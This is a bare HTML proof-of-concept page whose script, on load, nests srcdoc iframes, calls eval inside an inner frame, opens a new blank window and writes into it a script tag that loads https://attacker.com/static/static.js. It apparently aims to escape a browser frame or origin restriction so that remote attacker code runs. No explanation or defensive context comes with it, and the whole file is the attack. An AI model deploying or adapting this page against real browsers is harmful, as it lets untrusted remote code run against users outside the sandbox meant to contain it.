<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGvsVeRGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGvsVeRGGGGG.addEventListener("load",()=>{GGGGGvsVeRGGGGG.srcdoc="<iframe id=GGGGvsVeRGGGG src=about:blank><\/iframe><script>GGGGvsVeRGGGG.onload=_=>GGGGvsVeRGGGG.contentWindow.eval('w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);');GGGGvsVeRGGGG.contentWindow.location.reload();<\/script>";},{once:true});
};
</script>
</body>
</html>